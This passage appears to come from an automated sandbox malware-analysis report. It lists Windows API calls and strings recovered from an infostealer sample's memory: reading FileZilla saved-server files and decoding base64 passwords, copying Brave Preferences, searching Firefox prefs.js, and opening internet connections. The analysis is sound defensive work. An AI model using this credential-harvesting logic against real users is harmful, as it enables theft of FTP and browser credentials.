                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C83A26
                                • lstrlen.KERNEL32(?), ref: 00C83A33
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C83A53
                                • lstrcat.KERNEL32(00000000,?), ref: 00C83A61
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C83A8A
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C83ACE
                                • lstrlen.KERNEL32(?), ref: 00C83AD8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C83B05
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C83B10
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C83B36
                                • lstrlen.KERNEL32(00CA1794), ref: 00C83B48
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C83B6A
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C83B76
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C83B9E
                                • lstrlen.KERNEL32(?), ref: 00C83BB2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C83BD2
                                • lstrcat.KERNEL32(00000000,?), ref: 00C83BE0
                                • lstrlen.KERNEL32(01798908), ref: 00C83C0B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C83C31
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C83C3C
                                • lstrlen.KERNEL32(01798998), ref: 00C83C5E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C83C84
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C83C8F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C83CB7
                                • lstrlen.KERNEL32(00CA1794), ref: 00C83CC9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C83CE8
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C83CF4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C83D1A
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C83D47
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C83D52
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C83D79
                                • lstrlen.KERNEL32(00CA1794), ref: 00C83D8B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C83DAD
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C83DB9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C83DE2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C83E11
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C83E1C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C83E43
                                • lstrlen.KERNEL32(00CA1794), ref: 00C83E55
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C83E77
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C83E83
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C83EAC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C83EDB
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C83EE6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C83F0D
                                • lstrlen.KERNEL32(00CA1794), ref: 00C83F1F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C83F41
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C83F4D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C83F75
                                • lstrlen.KERNEL32(?), ref: 00C83F89
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C83FA9
                                • lstrcat.KERNEL32(00000000,?), ref: 00C83FB7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C83FE0
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C8401F
                                • lstrlen.KERNEL32(0179D8B0), ref: 00C8402E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C84056
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C84061
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8408A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C840CE
                                • lstrcat.KERNEL32(00000000), ref: 00C840DB
                                • FindNextFileA.KERNEL32(00000000,?), ref: 00C842D9
                                • FindClose.KERNEL32(00000000), ref: 00C842E8
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                                • String ID: %s\*.*
                                • API String ID: 1006159827-1013718255
                                • Opcode ID: 72c9be8abdc3f92bacb2278c75b03b1decec4325efe99e258e2aca4857a57460
                                • Instruction ID: 62998e0a647cbbcbcd42c24f5e2276251a482faa11f138565d16a7a5fb79156e
                                • Opcode Fuzzy Hash: 72c9be8abdc3f92bacb2278c75b03b1decec4325efe99e258e2aca4857a57460
                                • Instruction Fuzzy Hash: 3262B331A116169FCB21FFA5CC48AAFB7B9EF45704F098124F819A3251DB34EE05DB94
                                APIs
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C86995
                                • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 00C869C8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C86A02
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C86A29
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C86A34
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C86A5D
                                • lstrlen.KERNEL32(\AppData\Roaming\FileZilla\recentservers.xml), ref: 00C86A77
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C86A99
                                • lstrcat.KERNEL32(00000000,\AppData\Roaming\FileZilla\recentservers.xml), ref: 00C86AA5
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C86AD0
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C86B00
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00C86B35
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C86B9D
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C86BCD
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Similarity
                                • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlen
                                • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                • API String ID: 313953988-555421843
                                • Opcode ID: 6f01cbadfd2d9091bb2c4ecd5cc832df819e7fde5afb5124f80b03ec0ffa5e46
                                • Instruction ID: 4a5333884f1add3df2a18d301b7428ea6d44b2dc59ad2d340bca7310481a901b
                                • Opcode Fuzzy Hash: 6f01cbadfd2d9091bb2c4ecd5cc832df819e7fde5afb5124f80b03ec0ffa5e46
                                • Instruction Fuzzy Hash: 5E42B330A01216AFCB11BBB5DC89A6F7BB9EF45704F188424F915E7242DB34EE05DB64
                                APIs
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C7DBC1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7DBE4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C7DBEF
                                • lstrlen.KERNEL32(00CA4CA8), ref: 00C7DBFA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7DC17
                                • lstrcat.KERNEL32(00000000,00CA4CA8), ref: 00C7DC23
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7DC4C
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C7DC8F
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C7DCBF
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 00C7DCD0
                                • StrCmpCA.SHLWAPI(?,00CA17A0), ref: 00C7DCF0
                                • StrCmpCA.SHLWAPI(?,00CA17A4), ref: 00C7DD0A
                                • lstrlen.KERNEL32(00C9CFEC), ref: 00C7DD1D
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C7DD47
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7DD70
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C7DD7B
                                • lstrlen.KERNEL32(00CA1794), ref: 00C7DD86
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7DDA3
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C7DDAF
                                • lstrlen.KERNEL32(?), ref: 00C7DDBC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7DDDF
                                • lstrcat.KERNEL32(00000000,?), ref: 00C7DDED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7DE19
                                • lstrlen.KERNEL32(00CA1794), ref: 00C7DE3D
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C7DE6F
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C7DE7B
                                • lstrlen.KERNEL32(01798AD8), ref: 00C7DE8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7DEB0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C7DEBB
                                • lstrlen.KERNEL32(00CA1794), ref: 00C7DEC6
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C7DEE6
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C7DEF2
                                • lstrlen.KERNEL32(01798A88), ref: 00C7DF01
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7DF27
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C7DF32
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7DF5E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7DFA5
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C7DFB1
                                • lstrlen.KERNEL32(01798AD8), ref: 00C7DFC0
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7DFE9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C7DFF4
                                • lstrlen.KERNEL32(00CA1794), ref: 00C7DFFF
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C7E022
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C7E02E
                                • lstrlen.KERNEL32(01798A88), ref: 00C7E03D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7E063
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C7E06E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7E09A
                                • StrCmpCA.SHLWAPI(?,Brave), ref: 00C7E0CD
                                • StrCmpCA.SHLWAPI(?,Preferences), ref: 00C7E0E7
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C7E11F
                                • lstrlen.KERNEL32(0179D8B0), ref: 00C7E12E
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C7E155
                                • lstrcat.KERNEL32(00000000,?), ref: 00C7E15D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7E19F
                                • lstrcat.KERNEL32(00000000), ref: 00C7E1A9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7E1D0
                                • CopyFileA.KERNEL32(00000000,?,00000001), ref: 00C7E1F9
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C7E22F
                                • lstrlen.KERNEL32(01798908), ref: 00C7E23D
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C7E261
                                • lstrcat.KERNEL32(00000000,01798908), ref: 00C7E269
                                • FindNextFileA.KERNEL32(00000000,?), ref: 00C7E988
                                • FindClose.KERNEL32(00000000), ref: 00C7E997
                                 Memory Dump Source
                                 • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$FileFind$CloseCopyFirstNext
                                • String ID: Brave$Preferences$\Brave\Preferences
                                • API String ID: 1346089424-1230934161
                                • Opcode ID: e3647b8661e4ef679021e51bb2dc0392ff05c4f819d4e25d267b621f37f10ee9
                                • Instruction ID: 24eb7d372ee92dc697cfde96182a4c5a92b527097764e9a5b4c12ea5d85da6ad
                                • Opcode Fuzzy Hash: e3647b8661e4ef679021e51bb2dc0392ff05c4f819d4e25d267b621f37f10ee9
                                • Instruction Fuzzy Hash: 32527271A112069FCB21EF65DC89AAE77B9EF59300F09C064F81AE7252DB34ED059B90
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C760FF
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C76152
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C76185
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C761B5
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C761F0
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C76223
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00C76233
                                 Memory Dump Source
                                 • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Similarity
                                • API ID: lstrcpy$InternetOpen
                                • String ID: "$------
                                • API String ID: 2041821634-2370822465
                                • Opcode ID: 92f26b64795066c56bae4342775df5113b6bd88c30da7a27a615f2fb4b98aba1
                                • Instruction ID: ef763ccffbbb1e14a47ccdfd97ac9e0061b9cc1c30dab002fe5ff6464ebffacb
                                • Opcode Fuzzy Hash: 92f26b64795066c56bae4342775df5113b6bd88c30da7a27a615f2fb4b98aba1
                                • Instruction Fuzzy Hash: C8528B31A116169FCB21EBB5DC89AAE77B9EF48310F09C124F819E7252DB34ED05DB90
                                APIs
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C86B9D
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C86BCD
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C86BFD
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C86C2F
                                • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00C86C3C
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C86C43
                                • StrStrA.SHLWAPI(00000000,<Host>), ref: 00C86C5A
                                • lstrlen.KERNEL32(00000000), ref: 00C86C65
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C86CA8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C86CCF
                                • StrStrA.SHLWAPI(00000000,<Port>), ref: 00C86CE2
                                • lstrlen.KERNEL32(00000000), ref: 00C86CED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C86D30
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C86D57
                                • StrStrA.SHLWAPI(00000000,<User>), ref: 00C86D6A
                                • lstrlen.KERNEL32(00000000), ref: 00C86D75
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C86DB8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C86DDF
                                • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00C86DF2
                                • lstrlen.KERNEL32(00000000), ref: 00C86E01
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C86E49
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C86E71
                                • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00C86E94
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 00C86EA8
                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00C86EC9
                                • LocalFree.KERNEL32(00000000), ref: 00C86ED4
                                • lstrlen.KERNEL32(?), ref: 00C86F6E
                                • lstrlen.KERNEL32(?), ref: 00C86F81
                                 Memory Dump Source
                                 • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Similarity
                                • API ID: lstrcpy$lstrlen$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                                • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$browser: FileZilla$login: $password: $profile: null$url:
                                • API String ID: 2641759534-2314656281
                                • Opcode ID: df07a4cb55333b28ede0a06cda024510c6a11dc0d8d2260a920e93c34451e521
                                • Instruction ID: 1224aff8002853769385b81241d242f06d4494fbe27afed26e572bccc00ed5d4
                                • Opcode Fuzzy Hash: df07a4cb55333b28ede0a06cda024510c6a11dc0d8d2260a920e93c34451e521
                                • Instruction Fuzzy Hash: 8A02B130A01206AFCB11BBB5DD8DA6F7BB9EF49704F188424F916E7242DB34ED059764
                                APIs
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C84B51
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C84B74
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C84B7F
                                • lstrlen.KERNEL32(00CA4CA8), ref: 00C84B8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C84BA7
                                • lstrcat.KERNEL32(00000000,00CA4CA8), ref: 00C84BB3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C84BDE
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 00C84BFA
                                 Memory Dump Source
                                 • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Similarity
                                • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                • String ID: prefs.js
                                • API String ID: 2567437900-3783873740
                                • Opcode ID: 1177ae0df47270134a730467875970756bfa62f5b76f4d51d4c7be4cfca0ff26
                                • Instruction ID: 2a3517d63007f82bd70131dfee2c8fd1bf4c4e578020bc99576a395d86cc91ae
                                • Opcode Fuzzy Hash: 1177ae0df47270134a730467875970756bfa62f5b76f4d51d4c7be4cfca0ff26
                                • Instruction Fuzzy Hash: 2C925070A016128FDB24EF29C948B6AB7F5AF45318F19C0ADE819DB3A2D771ED41CB44
                                APIs
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C81291
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C812B4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C812BF
                                • lstrlen.KERNEL32(00CA4CA8), ref: 00C812CA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C812E7
                                • lstrcat.KERNEL32(00000000,00CA4CA8), ref: 00C812F3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8131E
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 00C8133A
                                • StrCmpCA.SHLWAPI(?,00CA17A0), ref: 00C8135C
                                • StrCmpCA.SHLWAPI(?,00CA17A4), ref: 00C81376
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C813AF
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C813D7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C813E2
                                • lstrlen.KERNEL32(00CA1794), ref: 00C813ED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8140A
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C81416
                                • lstrlen.KERNEL32(?), ref: 00C81423
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C81443
                                • lstrcat.KERNEL32(00000000,?), ref: 00C81451
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8147A
                                • StrCmpCA.SHLWAPI(?,0179D8F8), ref: 00C814A3
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C814E4
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8150D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C81535
                                • StrCmpCA.SHLWAPI(?,0179DD50), ref: 00C81552
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C81593
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C815BC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C815E4
                                • StrCmpCA.SHLWAPI(?,0179D748), ref: 00C81602
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C81633
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8165C
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C81685
                                • StrCmpCA.SHLWAPI(?,0179D7D8), ref: 00C816B3
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C816F4
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8171D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C81745
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C81796
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C817BE
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C817F5
                                • FindNextFileA.KERNEL32(00000000,?), ref: 00C8181C
                                • FindClose.KERNEL32(00000000), ref: 00C8182B
                                 Memory Dump Source
                                 • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Similarity
                                • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                                • String ID:
                                • API String ID: 1346933759-0
                                • Opcode ID: 7e91a6f723438b2e51bfd3d6547b712cf8251ba26d1609de59d636bee7d91b93
                                • Instruction ID: 4841de83e8ef04c6a15d217645bf940283635f46cdf84d9bae04a6e1421b3b23
                                • Opcode Fuzzy Hash: 7e91a6f723438b2e51bfd3d6547b712cf8251ba26d1609de59d636bee7d91b93
                                • Instruction Fuzzy Hash: 1D1252716112069FCB24EF79D889AAF77F8EF44304F098528BC5AE3251DB34ED468B94
                                APIs
                                • wsprintfA.USER32 ref: 00C8CBFC
                                • FindFirstFileA.KERNEL32(?,?), ref: 00C8CC13
                                • lstrcat.KERNEL32(?,?), ref: 00C8CC5F
                                • StrCmpCA.SHLWAPI(?,00CA17A0), ref: 00C8CC71
                                • StrCmpCA.SHLWAPI(?,00CA17A4), ref: 00C8CC8B
                                • wsprintfA.USER32 ref: 00C8CCB0
                                • PathMatchSpecA.SHLWAPI(?,01798A18), ref: 00C8CCE2
                                • CoInitialize.OLE32(00000000), ref: 00C8CCEE
                                  • Part of subcall function 00C8CAE0: CoCreateInstance.COMBASE(00C9B110,00000000,00000001,00C9B100,?), ref: 00C8CB06
                                  • Part of subcall function 00C8CAE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 00C8CB46
                                  • Part of subcall function 00C8CAE0: lstrcpyn.KERNEL32(?,?,00000104), ref: 00C8CBC9
                                • CoUninitialize.COMBASE ref: 00C8CD09
                                • lstrcat.KERNEL32(?,?), ref: 00C8CD2E
                                • lstrlen.KERNEL32(?), ref: 00C8CD3B
                                • StrCmpCA.SHLWAPI(?,00C9CFEC), ref: 00C8CD55
                                • wsprintfA.USER32 ref: 00C8CD7D
                                • wsprintfA.USER32 ref: 00C8CD9C
                                • PathMatchSpecA.SHLWAPI(?,?), ref: 00C8CDB0
                                • wsprintfA.USER32 ref: 00C8CDD8
                                • CopyFileA.KERNEL32(?,?,00000001), ref: 00C8CDF1
                                • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00C8CE10
                                • GetFileSizeEx.KERNEL32(00000000,?), ref: 00C8CE28
                                • CloseHandle.KERNEL32(00000000), ref: 00C8CE33
                                • CloseHandle.KERNEL32(00000000), ref: 00C8CE3F
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C8CE54
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8CE94
                                • FindNextFileA.KERNEL32(?,?), ref: 00C8CF8D
                                • FindClose.KERNEL32(?), ref: 00C8CF9F
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                                • String ID: %s%s$%s\%s$%s\%s\%s$%s\*
                                • API String ID: 3860919712-2388001722
                                • Opcode ID: dabc8ba2dc6f5b2103ff3c445042ff28ebeddae1a5a7c5cb3b7655d6637351d7
                                • Instruction ID: 50dc942a1878ebf1d5ba8908dcf73a43f85a487a7ec8669a62c0764600bdd2aa
                                • Opcode Fuzzy Hash: dabc8ba2dc6f5b2103ff3c445042ff28ebeddae1a5a7c5cb3b7655d6637351d7
                                • Instruction Fuzzy Hash: 7EC18475A002199FDB64EF64DC85AEE77B9FF89304F0485A9F519A7180EA30AB44CF60
                                APIs
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C81291
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C812B4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C812BF
                                • lstrlen.KERNEL32(00CA4CA8), ref: 00C812CA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C812E7
                                • lstrcat.KERNEL32(00000000,00CA4CA8), ref: 00C812F3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8131E
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 00C8133A
                                • StrCmpCA.SHLWAPI(?,00CA17A0), ref: 00C8135C
                                • StrCmpCA.SHLWAPI(?,00CA17A4), ref: 00C81376
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C813AF
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C813D7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C813E2
                                • lstrlen.KERNEL32(00CA1794), ref: 00C813ED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8140A
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C81416
                                • lstrlen.KERNEL32(?), ref: 00C81423
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C81443
                                • lstrcat.KERNEL32(00000000,?), ref: 00C81451
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8147A
                                • StrCmpCA.SHLWAPI(?,0179D8F8), ref: 00C814A3
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C814E4
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8150D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C81535
                                • StrCmpCA.SHLWAPI(?,0179DD50), ref: 00C81552
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C81593
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C815BC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C815E4
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C81796
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C817BE
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C817F5
                                • FindNextFileA.KERNEL32(00000000,?), ref: 00C8181C
                                • FindClose.KERNEL32(00000000), ref: 00C8182B
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
